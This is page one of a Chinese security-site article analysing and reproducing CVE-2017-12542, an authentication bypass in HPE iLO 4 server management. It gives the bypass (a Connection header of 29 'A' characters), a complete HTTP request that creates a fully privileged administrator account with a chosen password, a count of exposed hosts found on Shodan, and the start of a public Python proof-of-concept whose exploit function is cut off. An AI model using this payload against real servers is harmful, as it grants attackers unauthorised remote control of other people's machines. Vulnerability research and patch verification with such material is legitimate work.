欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

CVE-2017-12542简单分析及复现

来源:本站整理 作者:佚名 时间:2018-04-13 TAG: 我要投稿

简介
CVE-2017-12542是一个CVSS 9.8的高分漏洞,漏洞利用条件简单,危害较大。近十年来,iLO是几乎所有惠普服务器中都嵌入的服务器管理解决方案。它通过远程管理的方式为系统管理员提供了需要的功能。包括电源管理,远程系统控制台,远程CD/DVD映像安装等。HPE Integrated Lights-Out 4(iLO 4)中的漏洞可能允许未经身份验证的远程攻击者绕过验证并执行任意代码。

简要分析
一般,iLO的登录界面如下图所示:

当访问
https://127.0.0.1:8443/rest/v1/AccountService/Accounts
时,会返回HTTP/1.1 401 Unauthorized

在HTTP头的Connection中添加大于等于29个字符后,即可绕过验证(下图为成功获取到目标的iLO登录用户名):

向目标post添加用户的数据包,且Connection仍然用29个A,即可成功添加用户:
POST /rest/v1/AccountService/Accounts HTTP/1.1
Host: 127.0.0.1:8443
Content-Length: 273
Accept-Encoding: gzip, deflate
Accept: */*
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Content-Type: application/json
{"UserName": "administratar", "Password": "admin@123", "Oem": {"Hp": {"Privileges": {"RemoteConsolePriv": true, "iLOConfigPriv": true, "VirtualMediaPriv": true, "UserConfigPriv": true, "VirtualPowerAndResetPriv": true, "LoginPriv": true}, "LoginName": "administratar"}}}

添加的用户可登陆成功,且有完整的控制权限:

复现及利用
在shodan以HP-iLO-Server为关键词搜索结果大概有8800个,主要分布在美国、香港、英国等。

我们可以使用skelsec的PoC对目标进行验证:
#!/usr/bin/env python
"""
Exploit trigger was presented @reconbrx 2018
Vulnerability found and documented by synacktiv:
https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html
Original advisory from HP:
https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us
Other advisories for this CVE:
https://tools.cisco.com/security/center/viewAlert.x?alertId=54930
https://securitytracker.com/id/1039222
http://www.exploit-db.com/exploits/44005
https://packetstormsecurity.com/files/146303/HPE-iLO4-Add-New-Administrator-User.html
https://vulndb.cyberriskanalytics.com/164082
IMPORTANT:
THIS EXPLOIT IS JUST FOR ONE OUT OF THE THREE VULNERABILITES COVERED BY CVE-2017-12542!!!
The two other vulns are critical as well, but only triggerable on the host itself.
"""
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import json
import urllib3
# All of the HP iLO interfaces run on HTTPS, but most of them are using self-signed SSL cert.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
exploit_trigger = {'Connection' : 'A'*29}
accounts_url = 'https://%s/rest/v1/AccountService/Accounts'
def test(ip):
    url = accounts_url % ip
    try:
        response = requests.get(url, headers = exploit_trigger, verify = False)
    except Exception as e:
        return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))
    try:
        data = json.loads(response.text)
    except Exception as e:
        return False, 'Target response not as expected!, Exception data: %s' % (str(e),)
    return True, data
def exploit(ip, username, password):

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载